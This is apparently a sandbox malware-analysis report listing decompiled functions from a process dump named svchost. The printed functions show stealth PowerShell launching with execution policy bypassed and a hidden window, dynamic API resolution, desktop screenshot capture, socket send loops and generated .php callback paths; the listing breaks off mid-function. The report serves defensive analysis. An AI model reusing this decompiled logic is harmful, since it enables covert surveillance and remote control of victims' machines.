                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$AllocCloseCreateFirstHandleLocalNextSnapshotToolhelp32lstrlen
                    • String ID:
                    • API String ID: 4265933905-0
                    • Opcode ID: 20aad716efacb4020a3f2d4cd2ccca0bb7b88f6b7018812e2160de513c38710a
                    • Instruction ID: dbdc9a4303f8ee1da61cc47a42178b65da641127356edd23e79c1f724124ff55
                    • Opcode Fuzzy Hash: 20aad716efacb4020a3f2d4cd2ccca0bb7b88f6b7018812e2160de513c38710a
                    • Instruction Fuzzy Hash: CE1108B5500118ABDB509FA5CC85FDBB77CEF06314F0040ABFA06D3252E6789A448FA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e92ff3fc42427f78f4760d7d770cfa1d2bc0e69980730d4f21f406504775f3fa
                    • Instruction ID: da813aee8c1b5a9bbc0f1406eccabb7bba3a442ad8aff7123d068915381ea556
                    • Opcode Fuzzy Hash: e92ff3fc42427f78f4760d7d770cfa1d2bc0e69980730d4f21f406504775f3fa
                    • Instruction Fuzzy Hash: 35E14879A002158FDF60CF98C980BAAB7F1BF58314F1941AED845AB351E7B8ED41CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E004C1E20(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                    				char _v68;
                    				char _v328;
                    				char _v584;
                    				char _v844;
                    				CHAR* _t21;
                    				CHAR* _t23;
                    				CHAR* _t28;
                    				struct _SECURITY_ATTRIBUTES* _t45;
                    				void* _t47;
                    
                    				_t45 = 0;
                    				GetTempPathA(0x104,  &_v844);
                    				GetTempFileNameA( &_v844, 0, 0,  &_v328);
                    				_t21 = PathFindExtensionA( &_v328);
                    				_t23 = E004C3720(".ps1",  &_v584);
                    				_pop(_t47);
                    				lstrcpyA(_t21, _t23);
                    				if(E004C1C76(_t47,  &_v328, _a4, _a8) != 0) {
                    					_t28 = E004C1D41(0x400);
                    					_t55 = _t28;
                    					GetWindowsDirectoryA( &_v68, 0x40);
                    					_push( &_v328);
                    					_push( &_v68);
                    					wsprintfA(_t28, E004C3720("%s\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File \"%s\"",  &_v584));
                    					E004C1C26(_t28);
                    					CloseHandle(CreateThread(0, 0, E004C259B, E004C1CBE( &_v328, lstrlenA( &_v328) + 1), 0, 0));
                    					E004C1D2D(_t55);
                    					_t45 = 1;
                    				}
                    				return _t45;
                    			}












                    0x004c1e37
                    0x004c1e39
                    0x004c1e4f
                    0x004c1e5c
                    0x004c1e70
                    0x004c1e76
                    0x004c1e79
                    0x004c1e96
                    0x004c1ea1
                    0x004c1ea7
                    0x004c1eaf
                    0x004c1ebb
                    0x004c1ebf
                    0x004c1ed5
                    0x004c1edc
                    0x004c1f12
                    0x004c1f19
                    0x004c1f1f
                    0x004c1f1f
                    0x004c1f26

                    APIs
                    • GetTempPathA.KERNEL32(00000104,?,00000000,00000000), ref: 004C1E39
                    • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 004C1E4F
                    • PathFindExtensionA.SHLWAPI(?), ref: 004C1E5C
                      • Part of subcall function 004C3720: lstrcpyA.KERNEL32(?,?,?,004C212C,C:\,?,?,00000200,?,00000000,?,?,00000040), ref: 004C3729
                    • lstrcpyA.KERNEL32(00000000,00000000), ref: 004C1E79
                      • Part of subcall function 004C1C76: CreateFileA.KERNEL32(00000001,40000000,00000003,00000000,00000002,00000000,00000000,00000000,00000000,?,?,004C1E0A,?,00000001,004C178B), ref: 004C1C8D
                      • Part of subcall function 004C1C76: WriteFile.KERNEL32(00000000,?,004C1E0A,004C178B,00000000,?,?,004C1E0A,?,00000001,004C178B), ref: 004C1CA5
                      • Part of subcall function 004C1C76: CloseHandle.KERNEL32(00000000,?,?,004C1E0A,?,00000001,004C178B), ref: 004C1CAC
                      • Part of subcall function 004C1D41: LocalAlloc.KERNELBASE(00000040,?,?,004C3070,00080060), ref: 004C1D49
                    • GetWindowsDirectoryA.KERNEL32(?,00000040), ref: 004C1EAF
                    • wsprintfA.USER32 ref: 004C1ED5
                      • Part of subcall function 004C1C26: CreateProcessA.KERNEL32(00000000,004C1E1D,00000000,00000000,00000010,00000000,00000000,00000000,?,?), ref: 004C1C69
                    • lstrlenA.KERNEL32(?), ref: 004C1EEB
                    • CreateThread.KERNEL32(00000000,00000000,004C259B,00000000,00000000,00000000), ref: 004C1F0B
                    • CloseHandle.KERNEL32(00000000), ref: 004C1F12
                      • Part of subcall function 004C1D2D: LocalFree.KERNEL32(00000000), ref: 004C1D39
                    Strings
                    • %s\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "%s", xrefs: 004C1EC7
                    • .ps1, xrefs: 004C1E6B
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile$CloseHandleLocalPathTemplstrcpy$AllocDirectoryExtensionFindFreeNameProcessThreadWindowsWritelstrlenwsprintf
                    • String ID: %s\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "%s"$.ps1
                    • API String ID: 3511783442-563103103
                    • Opcode ID: e764a4cf6863cbc5c70d7d384aa2009365b356a8ffc0bc02f92104d9b4f3549e
                    • Instruction ID: 814d1f30f6fe113b1c2dd84a835fb2953e8d71466848d3056d8d371c019f82f3
                    • Opcode Fuzzy Hash: e764a4cf6863cbc5c70d7d384aa2009365b356a8ffc0bc02f92104d9b4f3549e
                    • Instruction Fuzzy Hash: C22156B7440118BFDB41ABA19D89FEE337CEB05304F00006BF609D6051DA745E458B6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004C24AA() {
                    				char _v68;
                    				struct HINSTANCE__* _t21;
                    
                    				_t21 = GetModuleHandleA(E004C3720("kernel32.dll",  &_v68));
                    				 *0x4c526c = GetProcAddress(_t21, E004C3720("GetProcAddress",  &_v68));
                    				 *0x4c5270 = GetProcAddress(_t21, E004C3720("LoadLibraryA",  &_v68));
                    				return E004C1849(E004C234A);
                    			}





                    0x004c24c8
                    0x004c24e2
                    0x004c2504
                    0x004c2511

                    APIs
                      • Part of subcall function 004C3720: lstrcpyA.KERNEL32(?,?,?,004C212C,C:\,?,?,00000200,?,00000000,?,?,00000040), ref: 004C3729
                    • GetModuleHandleA.KERNEL32(00000000), ref: 004C24C2
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004C24DC
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004C24F9
                      • Part of subcall function 004C1849: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004C1861
                      • Part of subcall function 004C1849: PathAppendA.SHLWAPI(?,00000000), ref: 004C1882
                      • Part of subcall function 004C1849: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 004C18BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$AppendCreateDirectoryHandleModulePathProcessSystemlstrcpy
                    • String ID: GetProcAddress$LoadLibraryA$kernel32.dll
                    • API String ID: 1276496715-2012913295
                    • Opcode ID: fedde41c617d83f5f6b5d7e2fdd301566b933088f837492628d2de451bd5ceb4
                    • Instruction ID: f1ca42f02f18ad1f19d9b32b4401c90d3aabba77365d019d188166f20e0f7159
                    • Opcode Fuzzy Hash: fedde41c617d83f5f6b5d7e2fdd301566b933088f837492628d2de451bd5ceb4
                    • Instruction Fuzzy Hash: 67F090BB404204AEA780ABA2AD5FEBE37BCE581750324402FF901C1090FE6869854A3D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E004C2AB8(void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                    				void* _v8;
                    				char _v12;
                    				char _v16;
                    				char _v20;
                    				intOrPtr _v24;
                    				char* _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				void* _v52;
                    				char _v56;
                    				intOrPtr _v120;
                    				char _v128;
                    				char* _t32;
                    				char* _t34;
                    				char* _t36;
                    				intOrPtr* _t37;
                    				intOrPtr* _t39;
                    				intOrPtr* _t43;
                    				void* _t47;
                    				intOrPtr* _t51;
                    				void* _t61;
                    
                    				_t32 =  &_v12;
                    				_push(_t32);
                    				_t47 = 0;
                    				_push(0);
                    				_push(_a4);
                    				L004C37FC();
                    				if(_t32 != 0) {
                    					L10:
                    					return _t47;
                    				}
                    				_t34 =  &_v8;
                    				__imp__CreateStreamOnHGlobal(0, 1, _t34, _t61);
                    				if(_t34 != 0) {
                    					L9:
                    					_push(_v12);
                    					L004C37F0();
                    					goto L10;
                    				} else {
                    					_v56 = 1;
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					_v28 =  &_v16;
                    					_t36 =  &_v56;
                    					_push(_t36);
                    					_push(_a8);
                    					_v16 = 0x32;
                    					_push(_v8);
                    					_v32 = 4;
                    					_push(_v12);
                    					_v36 = 1;
                    					L004C37F6();
                    					if(_t36 == 0) {
                    						_t39 = _v8;
                    						_push(0);
                    						_push( &_v128);
                    						_push(_t39);
                    						if( *((intOrPtr*)( *_t39 + 0x30))() == 0) {
                    							_t47 = E004C1D41(_v120);
                    							if(_t47 != 0) {
                    								_t51 = _v8;
                    								asm("xorps xmm0, xmm0");
                    								asm("movlpd [ebp-0x14], xmm0");
                    								 *((intOrPtr*)( *_t51 + 0x14))(_t51, _v24, _v20, 0, 0);
                    								_t43 = _v8;
                    								_push( &_v20);
                    								_push(_v120);
                    								_push(_t47);
                    								_push(_t43);
                    								if( *((intOrPtr*)( *_t43 + 0xc))() != 0) {
                    									E004C1D2D(_t47);
                    									_t47 = 0;
                    								} else {
                    									 *_a12 = _v120;
                    								}
                    							}
                    						}
                    					}
                    					_t37 = _v8;
                    					 *((intOrPtr*)( *_t37 + 8))(_t37);
                    					goto L9;
                    				}
                    			}
























                    0x004c2abe
                    0x004c2ac2
                    0x004c2ac3
                    0x004c2ac5
                    0x004c2ac6
                    0x004c2ac9
                    0x004c2ad0
                    0x004c2ba6
                    0x004c2baa
                    0x004c2baa
                    0x004c2ad7
                    0x004c2ae0
                    0x004c2ae8
                    0x004c2b9d
                    0x004c2b9d
                    0x004c2ba0
                    0x00000000
                    0x004c2aee
                    0x004c2aef
                    0x004c2afa
                    0x004c2afb
                    0x004c2afc
                    0x004c2afd
                    0x004c2b01
                    0x004c2b04
                    0x004c2b07
                    0x004c2b08
                    0x004c2b0b
                    0x004c2b12
                    0x004c2b15
                    0x004c2b1c
                    0x004c2b1f
                    0x004c2b26
                    0x004c2b2e
                    0x004c2b30
                    0x004c2b37
                    0x004c2b3b
                    0x004c2b3c
                    0x004c2b42
                    0x004c2b4c
                    0x004c2b51
                    0x004c2b53
                    0x004c2b58
                    0x004c2b5b
                    0x004c2b69
                    0x004c2b6c
                    0x004c2b74
                    0x004c2b75
                    0x004c2b78
                    0x004c2b79
                    0x004c2b7f
                    0x004c2b8c
                    0x004c2b92
                    0x004c2b81
                    0x004c2b87
                    0x004c2b87
                    0x004c2b7f
                    0x004c2b51
                    0x004c2b42
                    0x004c2b94
                    0x004c2b9a
                    0x00000000
                    0x004c2b9a

                    APIs
                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?,00000000), ref: 004C2AC9
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,-000000CA,00000000,?,00000000,?,00000000), ref: 004C2AE0
                    • GdipSaveImageToStream.GDIPLUS(?,-000000CA,00000000,00000000,00000000), ref: 004C2B26
                      • Part of subcall function 004C1D41: LocalAlloc.KERNELBASE(00000040,?,?,004C3070,00080060), ref: 004C1D49
                    • GdipDisposeImage.GDIPLUS(?), ref: 004C2BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: Gdip$CreateImageStream$AllocBitmapDisposeFromGlobalLocalSave
                    • String ID: 2
                    • API String ID: 3881129052-450215437
                    • Opcode ID: 9fe04b26cdc74ca59f95f3ff0e0262b2d1909374cdcc7cfb320f06f7fca58e6b
                    • Instruction ID: 5cb74acdc088cb989dd83458988b21c02cf1f3502e6ba7c1cd7edf5ed8ca19ed
                    • Opcode Fuzzy Hash: 9fe04b26cdc74ca59f95f3ff0e0262b2d1909374cdcc7cfb320f06f7fca58e6b
                    • Instruction Fuzzy Hash: 58312DB5900219AFDB10DFE5C984E9FBBBDFF49344B10416AF901A7211E7B59E01CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E004C2CA0(intOrPtr* _a4) {
                    				void* _v8;
                    				void* _v12;
                    				void* _v16;
                    				char _v20;
                    				char _v36;
                    				void* __edi;
                    				void* _t26;
                    				char* _t29;
                    				signed int _t33;
                    				intOrPtr _t40;
                    				void* _t41;
                    				void* _t43;
                    				signed int _t46;
                    				signed int _t49;
                    				void* _t53;
                    				signed int _t54;
                    
                    				_t54 = 0;
                    				 *_a4 = 0;
                    				_t26 = E004C2BAB();
                    				_v8 = _t26;
                    				if(_t26 != 0) {
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					_push(0);
                    					_push( &_v36);
                    					_t29 =  &_v20;
                    					_push(_t29);
                    					_v36 = 1;
                    					L004C37E4();
                    					if(_t29 == 0) {
                    						_push( &_v16);
                    						_push( &_v12);
                    						_v12 = 0;
                    						_v16 = 0;
                    						L004C3802();
                    						_t40 = _v16;
                    						if(_t40 == 0) {
                    							_t41 = _v8;
                    							L15:
                    							_push(_v20);
                    							L004C37EA();
                    							DeleteObject(_t41);
                    							_t33 = _t54;
                    							L16:
                    							return _t33;
                    						}
                    						_t53 = E004C1D41(_t40);
                    						if(_t53 == 0) {
                    							L12:
                    							_t41 = _v8;
                    							L13:
                    							E004C1D2D(_t53);
                    							goto L15;
                    						}
                    						_push(_t53);
                    						_push(_t40);
                    						_push(_v12);
                    						L004C3808();
                    						_t46 = 0;
                    						if(_v12 <= 0) {
                    							goto L12;
                    						}
                    						_t14 = _t53 + 0x10; // 0x10
                    						_t43 = _t14;
                    						do {
                    							_t49 = _t54;
                    							while( *((intOrPtr*)(0x4c42dc + _t49 * 4)) ==  *((intOrPtr*)(_t43 + _t49 * 4))) {
                    								_t49 = _t49 + 1;
                    								if(_t49 != 4) {
                    									continue;
                    								}
                    								_t41 = _v8;
                    								_t54 = E004C2AB8(_t53, _t41, _t46 * 0x4c + _t53, _a4);
                    								goto L13;
                    							}
                    							_t46 = _t46 + 1;
                    							_t43 = _t43 + 0x4c;
                    						} while (_t46 < _v12);
                    						goto L12;
                    					}
                    					_t33 = 0;
                    					goto L16;
                    				}
                    				return _t26;
                    			}



















                    0x004c2caa
                    0x004c2cac
                    0x004c2cae
                    0x004c2cb3
                    0x004c2cb8
                    0x004c2cc4
                    0x004c2cc5
                    0x004c2cc6
                    0x004c2cc7
                    0x004c2cc8
                    0x004c2ccc
                    0x004c2ccd
                    0x004c2cd0
                    0x004c2cd1
                    0x004c2cd8
                    0x004c2cdf
                    0x004c2cec
                    0x004c2cf0
                    0x004c2cf1
                    0x004c2cf4
                    0x004c2cf7
                    0x004c2cfc
                    0x004c2d01
                    0x004c2d67
                    0x004c2d6a
                    0x004c2d6a
                    0x004c2d6d
                    0x004c2d73
                    0x004c2d79
                    0x004c2d7c
                    0x00000000
                    0x004c2d7c
                    0x004c2d09
                    0x004c2d0e
                    0x004c2d5b
                    0x004c2d5b
                    0x004c2d5e
                    0x004c2d5f
                    0x00000000
                    0x004c2d64
                    0x004c2d10
                    0x004c2d11
                    0x004c2d12
                    0x004c2d15
                    0x004c2d1a
                    0x004c2d1f
                    0x00000000
                    0x00000000
                    0x004c2d21
                    0x004c2d21
                    0x004c2d24
                    0x004c2d24
                    0x004c2d26
                    0x004c2d33
                    0x004c2d37
                    0x00000000
                    0x00000000
                    0x004c2d3f
                    0x004c2d4e
                    0x00000000
                    0x004c2d4e
                    0x004c2d52
                    0x004c2d53
                    0x004c2d56
                    0x00000000
                    0x004c2d24
                    0x004c2ce1
                    0x00000000
                    0x004c2ce1
                    0x004c2d7f

                    APIs
                      • Part of subcall function 004C2BAB: OpenWindowStationA.USER32(WinSta0,00000000,0000037F), ref: 004C2BC1
                      • Part of subcall function 004C2BAB: GetProcessWindowStation.USER32(?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2,00000000,?,-000000CA), ref: 004C2BC9
                      • Part of subcall function 004C2BAB: SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2,00000000,?), ref: 004C2BD0
                      • Part of subcall function 004C2BAB: OpenInputDesktop.USER32(00000000,00000000,02000000,?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2), ref: 004C2BDD
                      • Part of subcall function 004C2BAB: GetCurrentThreadId.KERNEL32 ref: 004C2BE5
                      • Part of subcall function 004C2BAB: GetThreadDesktop.USER32(00000000,?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2,00000000,?), ref: 004C2BEC
                      • Part of subcall function 004C2BAB: SetThreadDesktop.USER32(00000000,?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2,00000000,?), ref: 004C2BF3
                      • Part of subcall function 004C2BAB: GetDesktopWindow.USER32 ref: 004C2BF9
                      • Part of subcall function 004C2BAB: GetWindowDC.USER32(00000000,?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2,00000000,?), ref: 004C2C03
                      • Part of subcall function 004C2BAB: CreateCompatibleDC.GDI32(00000000), ref: 004C2C14
                      • Part of subcall function 004C2BAB: GetWindowRect.USER32 ref: 004C2C27
                      • Part of subcall function 004C2BAB: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004C2C48
                      • Part of subcall function 004C2BAB: SelectObject.GDI32(00000000,00000000), ref: 004C2C57
                      • Part of subcall function 004C2BAB: BitBlt.GDI32(00000000,00000000,00000000,?,004C2CB3,00000000,00000000,00000000,00CC0020), ref: 004C2C71
                      • Part of subcall function 004C2BAB: SelectObject.GDI32(00000000,?), ref: 004C2C7F
                      • Part of subcall function 004C2BAB: DeleteDC.GDI32(00000000), ref: 004C2C89
                      • Part of subcall function 004C2BAB: ReleaseDC.USER32 ref: 004C2C93
                    • GdiplusStartup.GDIPLUS(00000000,?,00000000,?,-000000CA), ref: 004C2CD8
                    • GdipGetImageEncodersSize.GDIPLUS(-000000CA,?,00000000,00000000,?,00000000,?,-000000CA), ref: 004C2CF7
                    • GdipGetImageEncoders.GDIPLUS(-000000CA,?,00000000,-000000CA,?,00000000,00000000,?,00000000,?,-000000CA), ref: 004C2D15
                    • GdiplusShutdown.GDIPLUS(00000000,-000000CA,?,00000000,00000000,?,00000000,?,-000000CA), ref: 004C2D6D
                    • DeleteObject.GDI32(00000000), ref: 004C2D73
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$Desktop$ObjectStationThread$CompatibleCreateDeleteEncodersGdipGdiplusImageOpenProcessSelect$BitmapCurrentInputRectReleaseShutdownSizeStartup
                    • String ID:
                    • API String ID: 1843447716-0
                    • Opcode ID: 086db44a0a1f56bd3675e5a0ec24cdd319015cadb9d1bebecd6322490cc9dc1d
                    • Instruction ID: 0104080f64ce1e4dae3de78b5d161605387a3a41a7b9dcf65371885185948ed0
                    • Opcode Fuzzy Hash: 086db44a0a1f56bd3675e5a0ec24cdd319015cadb9d1bebecd6322490cc9dc1d
                    • Instruction Fuzzy Hash: 2E2196B9900219BFDF51DFA5CD81EEEB778FB59700B10406FE502A6212D7F89E018768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E004C206C(void* __eflags) {
                    				void* _t18;
                    				void* _t19;
                    
                    				_t18 = E004C1BBD(1, 3);
                    				if(_t18 > 0) {
                    					do {
                    						CloseHandle(CreateThread(0, 0, E004C14E4, 0, 0, 0));
                    						_push(0);
                    						_pop(0);
                    						_t18 = _t18 - 1;
                    					} while (_t18 != 0);
                    				}
                    				Sleep(E004C1BBD(3, 0xa) * 0x3e8);
                    				_t19 = E004C1BBD(5, 0xa);
                    				if(_t19 > 0) {
                    					do {
                    						CloseHandle(CreateThread(0, 0, E004C14E4, 0, 0, 0));
                    						_t19 = _t19 - 1;
                    					} while (_t19 != 0);
                    				}
                    				return 0;
                    			}





                    0x004c2076
                    0x004c207e
                    0x004c2080
                    0x004c2091
                    0x004c2097
                    0x004c2099
                    0x004c209a
                    0x004c209a
                    0x004c2080
                    0x004c20af
                    0x004c20be
                    0x004c20c4
                    0x004c20c6
                    0x004c20d9
                    0x004c20df
                    0x004c20df
                    0x004c20c6
                    0x004c20e5

                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,Function_000014E4,00000000,00000000,00000000), ref: 004C208A
                    • CloseHandle.KERNEL32(00000000), ref: 004C2091
                    • Sleep.KERNEL32(00000000), ref: 004C20AF
                    • CreateThread.KERNEL32(00000000,00000000,Function_000014E4,00000000,00000000,00000000), ref: 004C20D2
                    • CloseHandle.KERNEL32(00000000), ref: 004C20D9
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateHandleThread$Sleep
                    • String ID:
                    • API String ID: 2405502550-0
                    • Opcode ID: a777bab822bbd49aaa2492fb6ef2dfb233c39172396a18387a4c8194e015e937
                    • Instruction ID: 7f3ecbfca99c8d04ffd655ec4deb45feb54258b6be81c60effdd3ffa502a2f1d
                    • Opcode Fuzzy Hash: a777bab822bbd49aaa2492fb6ef2dfb233c39172396a18387a4c8194e015e937
                    • Instruction Fuzzy Hash: 05F081B6A883103FF2B522F16E1AF3B120CD711721F10091FBB00EA1D2E99C8C00457C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 27%
                    			E004C14E4(void* __edx, void* __eflags) {
                    				char _v68;
                    				char _v228;
                    				char _v740;
                    				signed int _t16;
                    				intOrPtr* _t39;
                    				void* _t43;
                    				void* _t45;
                    				void* _t47;
                    				void* _t49;
                    				void* _t56;
                    
                    				_t56 = __eflags;
                    				_t43 = __edx;
                    				E004C2265( &_v228);
                    				E004C1F95(_t56,  &_v68);
                    				_t16 =  *0x4c5274; // 0x0
                    				_t45 = E004C1234(_t43, (_t16 << 5) +  &_v228,  &_v68, 1);
                    				if(_t45 <= 0) {
                    					L8:
                    					return 0;
                    				}
                    				_t47 = 2;
                    				if(E004C148F(_t45, 0x4c5280, _t47) == 0) {
                    					L7:
                    					goto L8;
                    				}
                    				E004C1C05( &_v740, 3);
                    				_t39 = __imp__#19;
                    				_push(0);
                    				_push(3);
                    				_push( &_v740);
                    				_push(_t45);
                    				if( *_t39() > 0) {
                    					E004C15F3(_t45, _t47, _t47);
                    					E004C1C05( &_v740, 0xa);
                    					_push(0);
                    					_push(0xa);
                    					_push( &_v740);
                    					_push(_t45);
                    					if( *_t39() > 0) {
                    						E004C15F3(_t45, 0xa, _t47);
                    						_t49 = E004C1BBD(0x190, 0x200);
                    						E004C1C05( &_v740, _t49);
                    						_push(0);
                    						_push(_t49);
                    						_push( &_v740);
                    						_push(_t45);
                    						if( *_t39() > 0) {
                    							E004C15F3(_t45, 0, 5);
                    						}
                    					}
                    				}
                    				__imp__#3(_t45);
                    				goto L7;
                    			}













                    0x004c14e4
                    0x004c14e4
                    0x004c14f5
                    0x004c14fe
                    0x004c1509
                    0x004c151f
                    0x004c1526
                    0x004c15ec
                    0x004c15f0
                    0x004c15f0
                    0x004c152f
                    0x004c1541
                    0x004c15eb
                    0x00000000
                    0x004c15eb
                    0x004c1551
                    0x004c1556
                    0x004c155e
                    0x004c1560
                    0x004c1568
                    0x004c1569
                    0x004c156e
                    0x004c1573
                    0x004c1581
                    0x004c158f
                    0x004c1591
                    0x004c1593
                    0x004c1594
                    0x004c1599
                    0x004c159f
                    0x004c15b3
                    0x004c15bd
                    0x004c15cb
                    0x004c15cd
                    0x004c15ce
                    0x004c15cf
                    0x004c15d4
                    0x004c15db
                    0x004c15e0
                    0x004c15d4
                    0x004c1599
                    0x004c15e4
                    0x00000000

                    APIs
                      • Part of subcall function 004C1F95: lstrcatA.KERNEL32(?,00000000), ref: 004C2061
                      • Part of subcall function 004C148F: send.WS2_32(00000000,00000064,00000019,00000000), ref: 004C14D7
                    • send.WS2_32(00000000,?,00000003,00000000), ref: 004C156A
                    • closesocket.WS2_32(00000000), ref: 004C15E4
                      • Part of subcall function 004C15F3: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 004C165D
                    • send.WS2_32(00000000,?,0000000A,00000000), ref: 004C1595
                      • Part of subcall function 004C15F3: recv.WS2_32(00000000,?,00000200,00000000), ref: 004C1620
                    • send.WS2_32(00000000,?,00000000,00000000), ref: 004C15D0
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: send$closesocketlstrcatrecvselect
                    • String ID:
                    • API String ID: 1087639058-0
                    • Opcode ID: bf34286c73a9f34b7fe422bf23418fc0ea885aba6f2cf0f95e4603e795015f8a
                    • Instruction ID: b7c1af34a0491a47be03cdb6a6e6104a250db20ff12db46ea85de512b739818a
                    • Opcode Fuzzy Hash: bf34286c73a9f34b7fe422bf23418fc0ea885aba6f2cf0f95e4603e795015f8a
                    • Instruction Fuzzy Hash: 0D21F67694021476E761A2A5CCCBFFF266CAF82740F04009EF505E6193E7ACD741866D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004C1F95(void* __eflags, CHAR* _a4) {
                    				signed int _v8;
                    				char* _v12;
                    				intOrPtr _v16;
                    				char _v32;
                    				char _t33;
                    				CHAR* _t34;
                    				char _t38;
                    				signed int _t41;
                    				signed int _t43;
                    				signed int _t44;
                    				CHAR* _t45;
                    				void* _t52;
                    				char* _t61;
                    				void* _t62;
                    				signed int _t63;
                    				intOrPtr _t64;
                    				void* _t65;
                    
                    				_t62 = E004C1BBD(5, 0x10);
                    				_t63 = 0;
                    				if(_t62 > 0) {
                    					do {
                    						 *((intOrPtr*)(_t65 + _t63 * 4 - 0x5c)) = E004C1BBD(0, 0x23);
                    						_t63 = _t63 + 1;
                    					} while (_t63 < _t62);
                    				}
                    				_t64 =  *0x4c5150; // 0x10
                    				_t43 = 0;
                    				_v8 = _v8 & 0;
                    				if(_t64 > 0) {
                    					_t34 = _a4;
                    					_t54 = "730c0a4976f1cf34" - _t34;
                    					_t60 = _t34;
                    					_v12 = _t34;
                    					_v16 = "730c0a4976f1cf34" - _t34;
                    					do {
                    						_t38 = E004C232D(E004C2658( *(_t54 + _t60) & 0x000000ff) +  *((intOrPtr*)(_t65 + _t43 * 4 - 0x5c)));
                    						_t61 = _v12;
                    						 *_t61 = _t38;
                    						_t64 =  *0x4c5150; // 0x10
                    						_t43 =  >=  ? 0 : _t43 + 1;
                    						_t41 = _v8 + 1;
                    						_t60 = _t61 + 1;
                    						_t54 = _v16;
                    						_v8 = _t41;
                    						_v12 = _t61 + 1;
                    					} while (_t41 < _t64);
                    				}
                    				_t44 = 0;
                    				if(_t62 > 0) {
                    					do {
                    						_t33 = E004C232D( *((intOrPtr*)(_t65 + _t44 * 4 - 0x5c)));
                    						_t52 = _t64 + _t44;
                    						_t44 = _t44 + 1;
                    						 *((char*)(_t52 + _a4)) = _t33;
                    						_t64 =  *0x4c5150; // 0x10
                    					} while (_t44 < _t62);
                    				}
                    				_t45 = _a4;
                    				 *((char*)(_t64 + _t62 + _t45)) = 0;
                    				return lstrcatA(_t45, E004C3720(".php",  &_v32));
                    			}




















                    0x004c1fa7
                    0x004c1faa
                    0x004c1faf
                    0x004c1fb1
                    0x004c1fba
                    0x004c1fbe
                    0x004c1fc1
                    0x004c1fb1
                    0x004c1fc5
                    0x004c1fcb
                    0x004c1fcd
                    0x004c1fd2
                    0x004c1fd4
                    0x004c1fdc
                    0x004c1fde
                    0x004c1fe0
                    0x004c1fe3
